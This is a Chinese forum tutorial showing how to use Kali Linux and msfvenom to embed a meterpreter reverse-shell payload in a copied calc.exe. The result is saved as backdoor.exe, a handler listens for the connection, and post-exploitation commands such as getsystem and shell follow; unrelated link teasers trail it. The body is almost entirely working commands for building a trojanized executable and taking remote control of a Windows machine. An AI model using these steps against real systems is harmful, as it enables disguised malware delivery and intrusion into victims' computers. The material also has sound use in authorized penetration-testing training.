kali linux 运行exe,简单的kali linux控制win7系统
本帖最后由 青衫覆雪 于 2019-10-23 08:36 编辑
一、准备工作:
1、安装kali linux
2、从win7上拷贝一个可执行的.exe文件至kali linux(文中使用的是windows自带的calc.exe文件)
二、开始在kali linux上创建.exe文件
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -e x86/shikata_ga_nai -b 'x00' -x ./calc.exe -f exe -o /opt/z/backdoor.exe (没有报错就表示成功,可以切换到保存的路径下查看)
ps:(LHOST=192.168.88.128 #本机ip地址
LPORT=4444 #要监控的端口
./calc.exe #从windows复制过来的.exe文件
/opt/z/backdoor.exe #生成的文件要存放的路径和名称)
ps:msfvenom的基本参数
Options:
-p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled 为payload预先指定一个NOP滑动长度
-f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch 指定payload的目标架构
--platform 指定payload的目标平台
-s, --space 设定有效攻击荷载的最大长度
-b, --bad-chars 设定规避字符集,比如: '\x00\xff'
-i, --iterations 指定payload的编码次数
-c, --add-code 指定一个附加的win32 shellcode文件
-x, --template 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out 保存payload
-v, --var-name 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
三、在kali linux上启动监控
1、msfconsole #进入msf命令
2、use exploit/multi/handler #加载模块
3、set lhost 192.168.88.1 #要监控的ip
4、set lport 4444 #要监控的端口,与上文端口要一致
5、exploit -z -j #开始监听,等待程序响应
四、在windows上运行backdoor.exe文件
五、查看并连接
1、sessions #查看会话
有红色框中的信息,表示存在会话
2、msf exploit(handler) > sessions -i 1 #连接会话
出现"meterpreter >"表示连接成功,
3、连接成功以后可以进行操作,详见下文:
ps:
getsystem #会自动利用各种各样的系统漏洞来进行权限提升
migrate #进程id进程迁移
background #把当前的会话设置为背景,需要的时候在启用
getuid #查看对方正在运行的用户
ps #列出所有的进程
getpid #返回运行meterpreter的id号
sysinfo #产看系统信息和体系结构
shell #切换到cmd的系统权限方式
exit #退出shell会话返回meterpreter或终止meterpreter
---------------------------------------------------------------------------------------------------------
初次发帖,欢迎各位大佬指正
kali linux 运行exe,简单的kali linux控制win7系统相关推荐
- 兼容exe的linux系统,国产操作系统下想运行EXE?你何不虚拟个电脑系统出来
国产操作系统里,一般用的都是GNU/Linux生态的软件和应用.它和我们日常用的Windows系统的EXE应用不同.也正是因为Windows系统生态太强大完善了,或者我们的很多工作用的工具都离不开EX ...
- vs项目移植到linux运行,VS2008项目移植到Linux
不少人都遇到过这种情况:在Windows下用Visual Studio工具开发的程序需要移植到Linux系统中,做成Linux版本的,但程序比较大,在Linux上又离不开Make,手动编写Makefi ...
- linux运行好麻烦,解析用Linux非常困难、必须用命令行、很老又丑陋及无法运行游戏...
很多刚接触Linux的人都有四大疑问:使用Linux非常困难.在Linux中,您必须使用命令行.Linux很老又丑陋.Linux无法运行计算机游戏,本文为您解析,打消您对Linux的误解. 前言 对于 ...
- Linux学习:简单基础的Linux系统命令
Linux操作系统介绍 肯.汤普逊 丹尼斯.里奇 美国 贝尔实验室 1970-1973 BCPL->new B->C->UNIX系统->Mini ...
- corssover linux运行无效,使用 CrossOver 在 Linux运行 Windows 软件(金测OK)
使用 CrossOver 在 Linux运行 Windows 软件 即便是最忠实的 Linux 用户,有时候也需要运行一下 Windows 软件.有的用户为此保留了一台旧的 Windows PC,有 ...
- linux网卡有很多error,教你设置win7系统虚拟机安装linux提示network error的解决方法...
很多朋友在使用电脑的过程中,会发现win7系统虚拟机安装linux提示network error的现象,当遇到win7系统虚拟机安装linux提示network error的问题,我们要怎么解决呢?如 ...
- dell10代cpu装linux,戴尔10代cpu台式机装win7系统及bios设置|戴尔十代cpu台式机装win7...
[文章导读]戴尔台式机2020年发布的机器采用的intel 10代cpu,默认预装了win10系统,最近有很多网友想装win7,但发现改了win7后发现进不了系统,由于默认戴尔台式机安装win7有很多 ...
- 如何查html病毒svchost.exe,小编教你在Win7系统中检查svchost.exe进程是否为病毒的方法步骤...
在win7系统中,有时候我们打开任务管理器会发现,里面有一个叫svchost.exe的进程,这是动态连接中运行的一种程序,它在系统中占一般居着很大一部分资源,因此这个进程也很容易携带病毒,那么我们如何 ...
- linux运行o文件是什么,Linux的.a、.so和.o文件
在说明Linux的.a..so和.o文件关系之前,先来看看windows下obj,lib,dll,exe的关系 windows下obj,lib,dll,exe的关系 lib是和dll对应的.lib是静 ...
最新文章
- 详解 Date 对象
- Rook存储:Kubernetes中最优秀的存储
- iOS 四种保存数据的方式!
- 什么是云服务举例说明_云服务是什么功能
- 14种东西帮你治疗口腔溃疡 - 生活至上,美容至尚!
- SDG、SGD-M实现
- docker之设置开机自启动(二)
- Struts2技术详解
- python中的函数修饰符
- linux如何使用uboot的命令,Uboot常用命令使用
- Exchange企业实战技巧(27)邮件中使用数字签名和邮件加密功能
- 边际概率条件概率_数据科学家解释的边际联合和条件概率
- Pandas 统计分析基础 笔记4 任务4.4 使用分组聚合进行组内计算
- html加css绘制oprea的logo,拾人牙慧 – CSS3实现Opera浏览器的logo
- spring实现在一个类中调用另一个类的方法
- python和java那个更难_python难还是java难
- JDK1.6安装_BouncyCastle JCE扩展加密算法解决JDK1.6 sftp连接openssh8.6Algorithm negotiation fail问题
- python画图库-matplotlib
- Travel 最短路
- 以太坊Go-ethereum源码分析之启动流程
热门文章
- OpenCv中的cv::Mat::create()函数,cvRound(),cvFloor(),cvCeil()函数的详解l
- 你们期待的!免费加入星球福利
- 【交通标志识别】基于BP神经网络实现交通标志识别系统(含语音报警)附matlab代码
- pycharm导入ModuleNotFoundError: No module named最全方法整理
- Linux下selinux的初级管理
- [奇怪的小知识]从网页上下载内嵌的PDF、PPT文件(以Google浏览器为例)
- 存储管理(一):openfiler介绍及存储理解
- 动态数码管verilog模块功能分析
- NodeJs下express使用(七):body-parser和morgan的安装与使用
- c语言的结构体能存放函数吗,在C语言结构体中添加成员函数